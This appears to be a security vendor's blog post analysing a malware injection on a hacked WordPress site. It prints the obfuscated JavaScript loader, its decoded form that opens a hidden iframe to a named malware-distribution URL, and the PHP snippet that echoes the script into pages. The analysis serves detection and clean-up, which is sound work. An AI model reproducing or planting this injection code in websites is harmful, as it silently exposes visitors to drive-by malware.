Wednesday, October 9, 2013

Incorrect Injection Of Malware Detected

PHP code that supposed to trigger malicious injection was not implemented correctly

Background

Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Such malicious obfuscated JavaScript code is used to build malicious iframe invisible to the website user and which downloads content from remote malware distributor.

This infected website hosts Malicious JavaScript code injected in files. They are similar and almost the same as attacks covered in cookie-based iframe injections. And one more detected is Suspicious JavaScript code. This single suspicious file has .php extension while the actual threat detected was in JavaScript (see screenshot below). Let's take a closer look at both Malicious and Suspicious code.

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Website malware scanner report

Submission date: Sat Oct 5 15:10:45 2013
Infected website's files: 4
Website malware scan report link: http://goo.gl/8a7pPf

Real-time site check for malware
Sitescan malware report by Quttera

Threat dump:

Identified malicious php file
Suspicious website files

Identified Malicious website files
Malicious website files

Malware entry


Here is the malware as detected in 3 files marked as Malicious in Quttera's report.

Beautified script


  1. sp = "s" + "p" + "li" + "t";
  2. = window;
  3. = "dy";
  4. = document;
  5. aq = "0x";
  6. bv = (5 - 3 - 1);
  7. try {
  8.     ++(d.body)
  9. } catch (d21vd12v) {
  10.     vzs = false;
  11.     try {} catch (wb) {
  12.         vzs = 21;
  13.     }
  14.     if (1) {
  15.         f ="17:5d:6c:65:5a:6b:60:66:65:17:67:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:67:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:67:25:6a:69:5a:17:34:17:1e:5f:6b:6b:67:31:26:26:6a:6c:64:60:65:60:6a:6b:69:66:6a:58:63:5a:66:65:25:5c:6a:26:6e:67:24:60:65:5a:63:6c:5b:5c:6a:26:6b:2e:44:2b:3b:29:64:71:25:67:5f:67:1e:32:4:1:17:67:25:6a:6b:70:63:5c:25:67:66:6a:60:6b:60:66:65:17:34:17:1e:58:59:6a:66:63:6c:6b:5c:1e:32:4:1:17:67:25:6a:6b:70:63:5c:25:5a:66:63:66:69:17:34:17:1e:2b:27:2f:1e:32:4:1:17:67:25:6a:6b:70:63:5c:25:5f:5c:60:5e:5f:6b:17:34:17:1e:2b:27:2f:67:6f:1e:32:4:1:17:67:25:6a:6b:70:63:5c:25:6e:60:5b:6b:5f:17:34:17:1e:2b:27:2f:67:6f:1e:32:4:1:17:67:25:6a:6b:70:63:5c:25:63:5c:5d:6b:17:34:17:1e:28:27:27:27:2b:27:2f:1e:32:4:1:17:67:25:6a:6b:70:63:5c:25:6b:66:67:17:34:17:1e:28:27:27:27:2b:27:2f:1e:32:4:1:4:1:17:60:5d:17:1f:18:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:67:1e:20:20:17:72:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:1e:33:67:17:60:5b:34:53:1e:67:53:1e:17:5a:63:58:6a:6a:34:53:1e:67:27:30:53:1e:17:35:33:26:67:35:1e:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:67:1e:20:25:58:67:67:5c:65:5b:3a:5f:60:63:5b:1f:67:20:32:4:1:17:74:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:4a:5c:6b:3a:66:66:62:60:5c:1f:5a:66:66:62:60:5c:45:58:64:5c:23:5a:66:66:62:60:5c:4d:58:63:6c:5c:23:65:3b:58:70:6a:23:67:58:6b:5f:20:17:72:4:1:17:6d:58:69:17:6b:66:5b:58:70:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:6d:58:69:17:5c:6f:67:60:69:5c:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:60:5d:17:1f:65:3b:58:70:6a:34:34:65:6c:63:63:17:73:73:17:65:3b:58:70:6a:34:34:27:20:17:65:3b:58:70:6a:34:28:32:4:1:17:5c:6f:67:60:69:5c:25:6a:5c:6b:4b:60:64:5c:1f:6b:66:5b:58:70:25:5e:5c:6b:4b:60:64:5c:1f:20:17:22:17:2a:2d:27:27:27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5c:1f:17:65:58:64:5c:17:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:69:6b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:65:58:64:5c:17:22:17:19:34:19:17:20:32:4:1:17:6d:58:69:17:63:5c:65:17:34:17:6a:6b:58:69:6b:17:22:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:22:17:28:32:4:1:17:60:5d:17:1f:17:1f:17:18:6a:6b:58:69:6b:17:20:17:1d:1d:4:1:17:1f:17:65:58:64:5c:17:18:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:27:23:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:20:17:20:17:20:4:1:17:72:4:1:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:74:4:1:17:60:5d:17:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:63:5c:65:23:17:5c:65:5b:17:20:17:20:32:4:1:74:4:1:60:5d:17:1f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:67:27:30:1f:20:32:4:1:74:4:1:74"[sp](":");
  16.     }
  17.     w = f;
  18.     s = [];
  19.     for (= 22 - 20 - 2; - i + 1380 != 0; i += 1) {
  20.         j = i;
  21.         if ((0x19 == 031)) s += String["fromCharCode"](eval(aq + w[1 * j]) + 0xa - bv);
  22.     }
  23.     eval(s);
  24. }

Malicious payload

It can be seen that wp-includes folder of the WordPress installation is likely hacked.
Decoded payload generates hidden iframe to http://suministrosalcon.es/wp-includes/t7M4D2mz.php

  1. function p09() {
  2.  
  3.     var static = 'ajax';
  4.  
  5.     var controller = 'index.php';
  6.  
  7.     var p = document.createElement('iframe');
  8.  
  9.  
  10.  
  11.     p.src = 'http://suministrosalcon.es/wp-includes/t7M4D2mz.php';
  12.  
  13.     p.style.position = 'absolute';
  14.  
  15.     p.style.color = '408';
  16.  
  17.     p.style.height = '408px';
  18.  
  19.     p.style.width = '408px';
  20.  
  21.     p.style.left = '1000408';
  22.  
  23.     p.style.top = '1000408';
  24.  
  25.  
  26.  
  27.     if (!document.getElementById('p')) {
  28.  
  29.         document.write('<p id=\'p\' class=\'p09\' ></p>');
  30.  
  31.         document.getElementById('p').appendChild(p);
  32.  
  33.     }
  34.  
  35. }
  36.  
  37. function SetCookie(cookieName, cookieValue, nDays, path) {
  38.  
  39.     var today = new Date();
  40.  
  41.     var expire = new Date();
  42.  
  43.     if (nDays == null || nDays == 0) nDays = 1;
  44.  
  45.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  46.  
  47.     document.cookie = cookieName + "=" + escape(cookieValue)
  48.  
  49.     + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  50.  
  51. }
  52.  
  53. function GetCookie(name) {
  54.  
  55.     var start = document.cookie.indexOf(name + "=");
  56.  
  57.     var len = start + name.length + 1;
  58.  
  59.     if ((!start) &&
  60.  
  61.         (name != document.cookie.substring(0, name.length)))
  62.  
  63.     {
  64.  
  65.         return null;
  66.  
  67.     }
  68.  
  69.     if (start == -1) return null;
  70.  
  71.     var end = document.cookie.indexOf(";", len);
  72.  
  73.     if (end == -1) end = document.cookie.length;
  74.  
  75.     return unescape(document.cookie.substring(len, end));
  76.  
  77. }
  78.  
  79. if (navigator.cookieEnabled)
  80.  
  81. {
  82.  
  83.     if (GetCookie('visited_uq') == 55) {} else {
  84.         SetCookie('visited_uq', '55', '1', '/');
  85.  
  86.  
  87.  
  88.         p09();
  89.  
  90.     }
  91.  
  92. }

Blacklisting status

The redirected URL is detected by 3 vendors as per VirusTotal report.
VirusTotal report


Now let's take a look at something that looks like hacker's bug. When we analyze the file detected as Suspicious it appears that the infection was done incorrectly and as a result PHP injected AS IS into server output instead running on server side.

Here is the infection itself in PHP code
The $eylca contains the infection, and "echo $eylca; " performs that actual injection of generated JavaScript into the HTML page.

#0f2490#
if(empty($eylca)) { $eylca = " <script type=\"text/javascript\" language=\"javascript\" > sp=\"s\"+\"p\"+\"li\"+\"t\";w=window;z=\"dy\";d=document;aq=\"0x\";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f=\"17:5d:6c:65:5a:6b:60:66:65:17:71:61:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:71:61:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:71:61:25:6a:69:5a:17:34:17:1e:5f:6b:6b:67:31:26:26:6a:6c:64:60:65:60:6a:6b:69:66:6a:58:63:5a:66:65:25:5c:6a:26:6e:67:24:60:65:5a:63:6c:5b:5c:6a:26:6b:2e:44:2b:3b:29:64:71:25:67:5f:67:1e:32:4:1:17:71:61:25:6a:6b:70:63:5c:25:67:66:6a:60:6b:60:66:65:17:34:17:1e:58:59:6a:66:63:6c:6b:5c:1e:32:4:1:17:71:61:25:6a:6b:70:63:5c:25:5a:66:63:66:69:17:34:17:1e:27:2c:1e:32:4:1:17:71:61:25:6a:6b:70:63:5c:25:5f:5c:60:5e:5f:6b:17:34:17:1e:27:2c:67:6f:1e:32:4:1:17:71:61:25:6a:6b:70:63:5c:25:6e:60:5b:6b:5f:17:34:17:1e:27:2c:67:6f:1e:32:4:1:17:71:61:25:6a:6b:70:63:5c:25:63:5c:5d:6b:17:34:17:1e:28:27:27:27:27:2c:1e:32:4:1:17:71:61:25:6a:6b:70:63:5c:25:6b:66:67:17:34:17:1e:28:27:27:27:27:2c:1e:32:4:1:4:1:17:60:5d:17:1f:18:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:71:61:1e:20:20:17:72:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:1e:33:67:17:60:5b:34:53:1e:71:61:53:1e:17:5a:63:58:6a:6a:34:53:1e:71:61:27:30:53:1e:17:35:33:26:67:35:1e:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:71:61:1e:20:25:58:67:67:5c:65:5b:3a:5f:60:63:5b:1f:71:61:20:32:4:1:17:74:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:4a:5c:6b:3a:66:66:62:60:5c:1f:5a:66:66:62:60:5c:45:58:64:5c:23:5a:66:66:62:60:5c:4d:58:63:6c:5c:23:65:3b:58:70:6a:23:67:58:6b:5f:20:17:72:4:1:17:6d:58:69:17:6b:66:5b:58:70:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:6d:58:69:17:5c:6f:67:60:69:5c:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:60:5d:17:1f:65:3b:58:70:6a:34:34:65:6c:63:63:17:73:73:17:65:3b:58:70:6a:34:34:27:20:17:65:3b:58:70:6a:34:28:32:4:1:17:5c:6f:67:60:69:5c:25:6a:5c:6b:4b:60:64:5c:1f:6b:66:5b:58:70:25:5e:5c:6b:4b:60:64:5c:1f:20:17:22:17:2a:2d:27:27:27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5c:1f:17:65:58:64:5c:17:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:69:6b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:65:58:64:5c:17:22:17:19:34:19:17:20:32:4:1:17:6d:58:69:17:63:5c:65:17:34:17:6a:6b:58:69:6b:17:22:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:22:17:28:32:4:1:17:60:5d:17:1f:17:1f:17:18:6a:6b:58:69:6b:17:20:17:1d:1d:4:1:17:1f:17:65:58:64:5c:17:18:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:27:23:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:20:17:20:17:20:4:1:17:72:4:1:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:74:4:1:17:60:5d:17:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:63:5c:65:23:17:5c:65:5b:17:20:17:20:32:4:1:74:4:1:60:5d:17:1f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:71:61:27:30:1f:20:32:4:1:74:4:1:74\"[sp](\":\");}w=f;s=[];for(i=22-20-2;-i+1390!=0;i+=1){j=i;if((0x19==031))s+=String[\"fromCharCode\"](eval(aq+w[1*j])+0xa-bv);}ht=eval;ht(s)}</script> "; echo $eylca; }
#/0f2490#

Malware clean-up


Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.